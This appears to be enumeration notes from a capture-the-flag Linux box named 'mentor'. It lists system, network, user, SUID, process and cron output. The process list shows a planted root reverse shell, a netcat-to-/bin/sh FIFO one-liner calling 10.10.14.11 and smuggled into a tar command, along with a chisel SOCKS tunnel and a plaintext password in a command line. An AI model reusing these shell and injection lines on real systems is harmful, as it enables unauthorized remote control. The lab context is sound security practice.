System/Kernel


svc@mentor:~$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=33a5554034feb2af38e8c75872058883b2988bc5, for GNU/Linux 3.2.0, stripped
linux mentor 5.15.0-56-generic #62-ubuntu smp tue nov 22 19:54:14 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.1 LTS"
PRETTY_NAME="Ubuntu 22.04.1 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.1 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
home_url="https://www.ubuntu.com/"
support_url="https://help.ubuntu.com/"
bug_report_url="https://bugs.launchpad.net/ubuntu/"
privacy_policy_url="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

Ubuntu 22.04.1 LTS (Jammy Jellyfish) 5.15.0-56-generic x86_64

Networks


svc@mentor:~$ ip route ; arp -a
default via 10.10.10.2 dev eth0 
10.10.10.0/23 dev eth0 proto kernel scope link src 10.10.11.193 
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown 
172.18.0.0/16 dev br-a8a89c3bf6ff proto kernel scope link src 172.18.0.1 linkdown 
172.19.0.0/16 dev br-24ddaa1f3b47 proto kernel scope link src 172.19.0.1 linkdown 
172.20.0.0/16 dev br-028c7a43f929 proto kernel scope link src 172.20.0.1 linkdown 
172.21.0.0/16 dev br-3d63c18e314d proto kernel scope link src 172.21.0.1 linkdown 
172.22.0.0/16 dev br-7d5c72654da7 proto kernel scope link src 172.22.0.1 
? (172.22.0.2) at 02:42:ac:16:00:02 [ether] on br-7d5c72654da7
? (172.22.0.3) at 02:42:ac:16:00:03 [ether] on br-7d5c72654da7
? (172.22.0.4) at 02:42:ac:16:00:04 [ether] on br-7d5c72654da7
? (10.10.10.2) at 00:50:56:b9:10:14 [ether] on eth0
 
svc@mentor:~$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 172.22.0.1:81           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:43565         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.22.0.1:5432         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.22.0.1:8000         0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.22.0.1:51348        172.22.0.2:80           ESTABLISHED -                   
tcp        0      0 172.22.0.1:51336        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:51292        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:51288        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45838        ESTABLISHED -                   
tcp        0      0 172.22.0.1:51306        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      1 10.10.11.193:55492      8.8.8.8:53              SYN_SENT    -                   
tcp        0      0 172.22.0.1:51298        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45828        ESTABLISHED -                   
tcp        0      0 172.22.0.1:51284        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45798        ESTABLISHED -                   
tcp        0      0 172.22.0.1:51282        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:51350        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:51272        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:81           172.22.0.3:42874        ESTABLISHED -                   
tcp        0      0 172.22.0.1:51352        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45792        ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45780        ESTABLISHED -                   
tcp        0      0 172.22.0.1:51322        172.22.0.4:5432         ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45834        ESTABLISHED -                   
tcp        0      0 172.22.0.1:55766        172.22.0.1:8000         ESTABLISHED 2144/python3        
tcp        0      0 172.22.0.1:5432         172.22.0.3:45824        ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45808        ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45748        ESTABLISHED -                   
tcp        0   3276 10.10.11.193:22         10.10.14.11:39592       ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45764        ESTABLISHED -                   
tcp        0      0 172.22.0.1:5432         172.22.0.3:45738        ESTABLISHED -                   
udp        0      0 127.0.0.1:49995         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 10.10.11.193:42876      8.8.8.8:53              ESTABLISHED -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:161             0.0.0.0:*                           -                   
udp        0      0 10.10.11.193:45705      8.8.8.8:53              ESTABLISHED -                   

172.22.0.1:81 172.22.0.1:5432 172.22.0.1:8000 load balancing?

Users & Groups


svc@mentor:~$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
debian-snmp:x:114:119::/var/lib/snmp:/bin/false
svc:x:1001:1001:,,,:/home/svc:/bin/bash
james:x:1000:1000:,,,:/home/james:/bin/bash
fwupd-refresh:x:115:122:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
total 16
drwxr-xr-x  4 root  root  4096 Jun 10  2022 ./
drwxr-xr-x 19 root  root  4096 Nov 10  2022 ../
drwxr-x---  3 james james 4096 Nov 10  2022 james/
drwxr-x---  4 svc   svc   4096 Nov 11  2022 svc/

james

svc@mentor:~$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=103(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=104(systemd-timesync) gid=105(systemd-timesync) groups=105(systemd-timesync)
uid=105(pollinate) gid=1(daemon) groups=1(daemon)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(syslog) gid=113(syslog) groups=113(syslog),4(adm)
uid=108(uuidd) gid=114(uuidd) groups=114(uuidd)
uid=109(tcpdump) gid=115(tcpdump) groups=115(tcpdump)
uid=110(tss) gid=116(tss) groups=116(tss)
uid=111(landscape) gid=117(landscape) groups=117(landscape)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=999(lxd) gid=100(users) groups=100(users)
uid=113(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=114(Debian-snmp) gid=119(Debian-snmp) groups=119(Debian-snmp)
uid=1001(svc) gid=1001(svc) groups=1001(svc)
uid=1000(james) gid=1000(james) groups=1000(james)
uid=115(fwupd-refresh) gid=122(fwupd-refresh) groups=122(fwupd-refresh)

SUIDs


svc@mentor:~$ find / -perm -04000 -ls -type f 2>/dev/null
     8944     20 -rwsr-xr-x   1 root     root        18736 Feb 26  2022 /usr/libexec/polkit-agent-helper-1
     1602    332 -rwsr-xr-x   1 root     root       338536 Feb 25  2022 /usr/lib/openssh/ssh-keysign
    14574    136 -rwsr-xr-x   1 root     root       138408 Nov 28  2022 /usr/lib/snapd/snap-confine
     6039     36 -rwsr-xr--   1 root     messagebus    35112 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3164     60 -rwsr-xr-x   1 root     root          59976 Nov 24  2022 /usr/bin/passwd
     1185     36 -rwsr-xr-x   1 root     root          35192 Feb 21  2022 /usr/bin/umount
     3161     72 -rwsr-xr-x   1 root     root          72072 Nov 24  2022 /usr/bin/gpasswd
      679     36 -rwsr-xr-x   1 root     root          35200 Mar 23  2022 /usr/bin/fusermount3
     4717    228 -rwsr-xr-x   1 root     root         232416 Aug  4  2022 /usr/bin/sudo
     1109     56 -rwsr-xr-x   1 root     root          55672 Feb 21  2022 /usr/bin/su
      828     48 -rwsr-xr-x   1 root     root          47480 Feb 21  2022 /usr/bin/mount
     3153     72 -rwsr-xr-x   1 root     root          72712 Nov 24  2022 /usr/bin/chfn
     3154     44 -rwsr-xr-x   1 root     root          44808 Nov 24  2022 /usr/bin/chsh
    91010     40 -rwsr-xr-x   1 root     root          40496 Nov 24  2022 /usr/bin/newgrp
      812     84 -rwsr-xr-x   1 root     root          85064 Mar 14  2022 /snap/core20/1518/usr/bin/chfn
      818     52 -rwsr-xr-x   1 root     root          53040 Mar 14  2022 /snap/core20/1518/usr/bin/chsh
      887     87 -rwsr-xr-x   1 root     root          88464 Mar 14  2022 /snap/core20/1518/usr/bin/gpasswd
      971     55 -rwsr-xr-x   1 root     root          55528 Feb  7  2022 /snap/core20/1518/usr/bin/mount
      980     44 -rwsr-xr-x   1 root     root          44784 Mar 14  2022 /snap/core20/1518/usr/bin/newgrp
      993     67 -rwsr-xr-x   1 root     root          68208 Mar 14  2022 /snap/core20/1518/usr/bin/passwd
     1102     67 -rwsr-xr-x   1 root     root          67816 Feb  7  2022 /snap/core20/1518/usr/bin/su
     1103    163 -rwsr-xr-x   1 root     root         166056 Jan 19  2021 /snap/core20/1518/usr/bin/sudo
     1161     39 -rwsr-xr-x   1 root     root          39144 Feb  7  2022 /snap/core20/1518/usr/bin/umount
     1248     51 -rwsr-xr--   1 root     systemd-resolve    51344 Apr 29  2022 /snap/core20/1518/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     1620    463 -rwsr-xr-x   1 root     root              473576 Mar 30  2022 /snap/core20/1518/usr/lib/openssh/ssh-keysign
      136    121 -rwsr-xr-x   1 root     root              123560 Sep 29  2022 /snap/snapd/17336/usr/lib/snapd/snap-confine

SGIDs


svc@mentor:~$ find / -perm -02000 -ls -type f 2>/dev/null
      456      0 drwxr-sr-x   2 root     systemd-journal       40 dec 28 08:56 /run/log/journal
   278197      4 drwxrwsr-x   2 root     staff               4096 Jun  3  2022 /usr/local/share/fonts
     9122     24 -rwxr-sr-x   1 root     shadow             22680 Mar 24  2022 /usr/sbin/pam_extrausers_chkpwd
     9168     28 -rwxr-sr-x   1 root     shadow             26776 Mar 24  2022 /usr/sbin/unix_chkpwd
   136891     16 -rwxr-sr-x   1 root     utmp               14488 Mar 24  2022 /usr/lib/x86_64-linux-gnu/utempter/utempter
     1240     24 -rwxr-sr-x   1 root     tty                22912 Feb 21  2022 /usr/bin/write.ul
     3152     72 -rwxr-sr-x   1 root     shadow             72184 Nov 24  2022 /usr/bin/chage
     1095    288 -rwxr-sr-x   1 root     _ssh              293304 Feb 25  2022 /usr/bin/ssh-agent
     3160     24 -rwxr-sr-x   1 root     shadow             23136 Nov 24  2022 /usr/bin/expiry
      595     40 -rwxr-sr-x   1 root     crontab            39568 Mar 23  2022 /usr/bin/crontab
     1227     24 -rwxr-sr-x   1 root     tty                22904 Feb 21  2022 /usr/bin/wall
    11247      4 drwxrwsr-x   2 root     staff               4096 Apr 18  2022 /var/local
    11249      4 drwxrwsr-x   2 root     mail                4096 Apr 21  2022 /var/mail
    11686      4 drwxr-sr-x   3 root     systemd-journal     4096 Jun  3  2022 /var/log/journal
   277925      4 drwxr-sr-x   2 root     systemd-journal     4096 dec 28 10:13 /var/log/journal/b6c579db13a547709e7355ce97d43e86
      807     83 -rwxr-sr-x   1 root     shadow             84512 Mar 14  2022 /snap/core20/1518/usr/bin/chage
      868     31 -rwxr-sr-x   1 root     shadow             31312 Mar 14  2022 /snap/core20/1518/usr/bin/expiry
     1094    343 -rwxr-sr-x   1 root     systemd-timesync   350504 Mar 30  2022 /snap/core20/1518/usr/bin/ssh-agent
     1180     35 -rwxr-sr-x   1 root     tty                 35048 Feb  7  2022 /snap/core20/1518/usr/bin/wall
     7237     43 -rwxr-sr-x   1 root     shadow              43168 Sep 17  2021 /snap/core20/1518/usr/sbin/pam_extrausers_chkpwd
     7281     43 -rwxr-sr-x   1 root     shadow              43160 Sep 17  2021 /snap/core20/1518/usr/sbin/unix_chkpwd
    11781      0 drwxrwsr-x   2 root     mail                    3 May 27  2022 /snap/core20/1518/var/mail

Processes


svc@mentor:~$ ps -auxwww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 100824 11676 ?        Ss   08:56   0:02 /sbin/init
root         515  0.0  0.3  64200 14928 ?        S<s  08:56   0:00 /lib/systemd/systemd-journald
root         556  0.0  0.6 289348 27100 ?        SLsl 08:56   0:00 /sbin/multipathd -d -s
root         559  0.0  0.1  26644  7256 ?        Ss   08:56   0:00 /lib/systemd/systemd-udevd
systemd+     592  0.0  0.1  16244  7928 ?        Ss   08:56   0:00 /lib/systemd/systemd-networkd
systemd+     765  0.0  0.3  25524 13464 ?        Ss   08:56   0:00 /lib/systemd/systemd-resolved
systemd+     766  0.0  0.1  89352  6500 ?        Ssl  08:56   0:00 /lib/systemd/systemd-timesyncd
root         783  0.0  0.2  51124 11676 ?        Ss   08:56   0:00 /usr/bin/VGAuthService
root         784  0.1  0.2 315872  9612 ?        Ssl  08:56   0:08 /usr/bin/vmtoolsd
root         810  0.0  0.1 101232  5952 ?        Ssl  08:56   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
message+     892  0.0  0.1   8764  4696 ?        Ss   08:56   0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         905  0.0  0.0  82832  3904 ?        Ssl  08:56   0:00 /usr/sbin/irqbalance --foreground
root         906  0.0  0.4  32788 19412 ?        Ss   08:56   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         908  0.0  0.1 234484  6572 ?        Ssl  08:56   0:00 /usr/libexec/polkitd --no-debug
syslog       909  0.0  0.1 222400  6164 ?        Ssl  08:56   0:00 /usr/sbin/rsyslogd -n -iNONE
root         910  0.0  0.6 1392356 27736 ?       Ssl  08:56   0:01 /usr/lib/snapd/snapd
root         911  0.0  0.1  15364  7464 ?        Ss   08:56   0:00 /lib/systemd/systemd-logind
root         912  0.0  0.3 392556 12708 ?        Ssl  08:56   0:00 /usr/libexec/udisks2/udisksd
root         923  0.0  0.2 317012 11876 ?        Ssl  08:56   0:00 /usr/sbin/ModemManager
root        1222  0.0  0.0   6892  2992 ?        Ss   08:56   0:00 /usr/sbin/cron -f -P
Debian-+    1224  0.0  0.3  24888 13928 ?        Ss   08:56   0:04 /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
root        1232  0.1  0.9 1337796 37140 ?       Ssl  08:56   0:11 /usr/bin/containerd
root        1254  0.0  0.0   6172  1112 tty1     Ss+  08:56   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root        1255  0.0  0.2  15420  9308 ?        Ss   08:56   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root        1281  0.0  0.1  43868  5636 ?        Ss   08:56   0:00 /usr/sbin/apache2 -k start
www-data    1282  0.0  0.1 1248860 5588 ?        Sl   08:56   0:00 /usr/sbin/apache2 -k start
www-data    1283  0.0  0.1 1248916 5588 ?        Sl   08:56   0:00 /usr/sbin/apache2 -k start
root        1345  0.0  1.9 1602180 78656 ?       Ssl  08:56   0:03 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
svc         1697  0.0  0.0   7368  3492 ?        Ss   08:56   0:00 /bin/bash /usr/local/bin/login.sh
root        1761  0.0  0.0 1148576 2812 ?        Sl   08:57   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.22.0.1 -host-port 5432 -container-ip 172.22.0.4 -container-port 5432
root        1774  0.0  0.2 711156  8444 ?        Sl   08:57   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 96e44c5692920491cdb954f3d352b3532a88425979cd48b3959b63bfec98a6f4 -address /run/containerd/containerd.sock
lxd         1796  0.0  0.6 213080 26832 ?        Ss   08:57   0:00 postgres
root        1881  0.0  0.0 1074844 3056 ?        Sl   08:57   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.22.0.1 -host-port 8000 -container-ip 172.22.0.3 -container-port 8000
root        1893  0.0  0.2 710900  8008 ?        Sl   08:57   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id a05537a193df0c30ebc3892f92e3884d9ba9241e8e168fdd755731acb63fa813 -address /run/containerd/containerd.sock
lxd         1914  0.0  0.1 213196  7844 ?        Ss   08:57   0:00 postgres: checkpointer 
lxd         1915  0.0  0.1 213080  5824 ?        Ss   08:57   0:00 postgres: background writer 
lxd         1916  0.0  0.2 213080  9936 ?        Ss   08:57   0:00 postgres: walwriter 
lxd         1917  0.0  0.2 213640  8476 ?        Ss   08:57   0:00 postgres: autovacuum launcher 
lxd         1918  0.0  0.1  67572  4736 ?        Ss   08:57   0:00 postgres: stats collector 
lxd         1919  0.0  0.1 213512  6604 ?        Ss   08:57   0:00 postgres: logical replication launcher 
root        1921  0.7  0.5  21704 19976 ?        Ss   08:57   0:42 python3 -m uvicorn app.main:app --reload --workers 2 --host 0.0.0.0 --port 8000
root        1992  0.0  0.0 1148576 3128 ?        Sl   08:57   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 172.22.0.1 -host-port 81 -container-ip 172.22.0.2 -container-port 80
root        2006  0.0  0.1 710644  7684 ?        Sl   08:57   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 457d4bd70deff2a68b4fd268e6fc8bef760c0be2d5ffa6cdd5440386ab5e8277 -address /run/containerd/containerd.sock
root        2030  0.0  0.7  32236 28548 ?        Ssl  08:57   0:01 python main.py
root        2049  0.0  0.2   9472  8484 ?        S    08:57   0:00 /usr/local/bin/python3 -c from multiprocessing.semaphore_tracker import main;main(4)
root        2050  0.0  1.4  64704 59356 ?        S    08:57   0:01 /usr/local/bin/python3 -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7) --multiprocessing-fork
lxd         2094  0.0  0.3 214740 14952 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51272) idle
lxd         2123  0.0  0.3 214156 13744 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51282) idle
lxd         2124  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51284) idle
lxd         2125  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51288) idle
lxd         2126  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51292) idle
lxd         2127  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51298) idle
lxd         2128  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51306) idle
lxd         2129  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51322) idle
lxd         2130  0.0  0.2 214012 11620 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51336) idle
lxd         2131  0.0  0.2 214012 11620 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51350) idle
lxd         2132  0.0  0.2 214012 11684 ?        Ss   08:57   0:00 postgres: postgres mentorquotes_db 172.22.0.1(51352) idle
root        2133  0.0  0.0   1624   892 ?        S    08:57   0:00 sh -c tar -c -f ; mkfifo /tmp/tsharv; nc 10.10.14.11 9999 0</tmp/tsharv | /bin/sh >/tmp/tsharv 2>&1; rm /tmp/tsharv #/app_backkup.tar /app/ &
root        2136  0.0  0.0   1576     4 ?        S    08:57   0:00 nc 10.10.14.11 9999
root        2137  0.0  0.0   1624     4 ?        S    08:57   0:00 /bin/sh
root        2138  0.0  0.0   1632  1028 ?        S    08:57   0:00 sh -i
svc         2144  0.0  0.6  33460 24528 ?        S    08:57   0:00 /usr/bin/python3 /usr/local/bin/login.py kj23sadkj123as0-d213
root        2519  0.3  0.3 710968 12992 ?        Sl   09:51   0:10 ./chiselx64 client 10.10.14.11:55555 R:48823:socks
root        2582  0.0  0.2  17164 11028 ?        Ss   10:13   0:00 sshd: svc [priv]
svc         2585  0.0  0.2  17176  9800 ?        Ss   10:13   0:00 /lib/systemd/systemd --user
svc         2587  0.0  0.0 103876  3880 ?        S    10:13   0:00 (sd-pam)
svc         2693  0.0  0.2  17296  7980 ?        S    10:13   0:00 sshd: svc@pts/0
svc         2695  0.0  0.1   8780  5460 pts/0    Ss   10:13   0:00 -bash
svc         2908  0.0  0.0  10332  3748 pts/0    R+   10:36   0:00 ps -auxwww

/usr/libexec/polkitd --no-debug /usr/sbin/cron -f -P

Cron & Systemd


svc@mentor:~$ crontab -l ; cat /etc/crontab ; systemctl list-timers
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
# 10 * * * *  sleep 30; /usr/local/bin/login.py 'kj23sadkj123as0-d213'
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
 
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#path=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
# example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT                        LEFT          LAST                        PASSED              UNIT                           ACTIVATES     >
thu 2023-12-28 11:40:18 UTC 1h 1min left  Thu 2022-11-10 12:38:59 UTC 1 year 1 month ago  motd-news.timer                motd-news.serv>
thu 2023-12-28 13:29:35 UTC 2h 51min left Thu 2022-11-10 12:38:59 UTC 1 year 1 month ago  fwupd-refresh.timer            fwupd-refresh.>
thu 2023-12-28 15:39:37 UTC 5h 1min left  Thu 2022-11-10 10:25:39 UTC 1 year 1 month ago  apt-daily.timer                apt-daily.serv>
thu 2023-12-28 15:50:06 UTC 5h 11min left Thu 2023-12-28 09:23:30 UTC 1h 14min ago        ua-timer.timer                 ua-timer.servi>
thu 2023-12-28 18:52:26 UTC 8h left       Mon 2022-12-05 14:26:43 UTC 1 year 0 months ago man-db.timer                   man-db.service
fri 2023-12-29 00:00:00 UTC 13h left      n/a                         n/a                 dpkg-db-backup.timer           dpkg-db-backup>
fri 2023-12-29 00:00:00 UTC 13h left      Thu 2023-12-28 08:56:53 UTC 1h 41min ago        logrotate.timer                logrotate.serv>
fri 2023-12-29 06:56:25 UTC 20h left      Thu 2023-12-28 08:57:45 UTC 1h 40min ago        apt-daily-upgrade.timer        apt-daily-upgr>
fri 2023-12-29 09:01:49 UTC 22h left      Thu 2023-12-28 09:01:49 UTC 1h 36min ago        update-notifier-download.timer update-notifie>
fri 2023-12-29 09:11:50 UTC 22h left      Thu 2023-12-28 09:11:50 UTC 1h 26min ago        systemd-tmpfiles-clean.timer   systemd-tmpfil>
sun 2023-12-31 03:10:52 UTC 2 days left   Thu 2023-12-28 08:56:53 UTC 1h 41min ago        e2scrub_all.timer              e2scrub_all.se>
mon 2024-01-01 01:11:12 UTC 3 days left   Thu 2023-12-28 09:27:51 UTC 1h 10min ago        fstrim.timer                   fstrim.service
tue 2024-01-02 17:39:19 UTC 5 days left   Mon 2022-06-06 19:43:24 UTC 1 year 6 months ago update-notifier-motd.timer     update-notifie>
 
13 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-17/17 (END)

10 * * * * sleep 30; /usr/local/bin/login.py 'kj23sadkj123as0-d213' (commented out)

Sudo Version


svc@mentor:~$ sudo --version
Sudo version 1.9.9
Sudoers policy plugin version 1.9.9
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.9
Sudoers audit plugin version 1.9.9

Sudo version 1.9.9

Glibc Version


svc@mentor:~$ ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35